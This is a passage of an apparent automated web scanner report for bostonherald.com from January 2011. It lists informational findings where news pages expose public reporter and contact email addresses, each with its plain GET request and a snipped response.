Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:heraldsquare@bostonherald.com?subject=For Katy">heraldsquare@bostonherald.com</a>
...[SNIP]...

21.29. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:52:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:holly@TuesdayAssociates.com">holly@TuesdayAssociates.com</a>
...[SNIP]...

21.30. http://www.bostonherald.com/blogs/news/on_the_t/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/on_the_t/

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/news/on_the_t/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:51:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/on_the_t/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 64725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:heraldsquare@bostonherald.com">heraldsquare@bostonherald.com</a>
...[SNIP]...

21.31. http://www.bostonherald.com/business/general/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /business/general/view.bg?articleid=1312531&srvc=home&position=rated HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:block">tgrillo@bostonherald.com</div>
...[SNIP]...

21.32. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jfitz@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">jfitz@bostonherald.com</div>
...[SNIP]...

21.33. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jfitz@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">jfitz@bostonherald.com</div>
...[SNIP]...

21.34. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jfitz@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-jfitz@bostonherald.com</div>
...[SNIP]...

21.35. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The following email address was disclosed in the response:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:block">tgrillo@bostonherald.com</div>
...[SNIP]...

21.36. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

Issue detail

The following email address was disclosed in the response:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:block">tgrillo@bostonherald.com</div>
...[SNIP]...

21.37. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:17:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="articleTagline" style="display:block">-tgrillo@bostonherald.com</div>
...[SNIP]...

21.38. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The following email address was disclosed in the response:

Request

GET /business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:14:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jvansack@bostonherald.com">
...[SNIP]...
<a href="mailto:jvansack@bostonherald.com">jvansack@bostonherald.com</a>
...[SNIP]...

21.39. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view.bg

Issue detail

The following email addresses were disclosed in the response:

Request

GET /entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jverniere@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-jverniere@bostonherald.com</div>
...[SNIP]...

21.40. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The following email addresses were disclosed in the response:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:jverniere@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-jverniere@bostonherald.com</div>
...[SNIP]...

21.41. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

Issue detail

The following email addresses were disclosed in the response:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
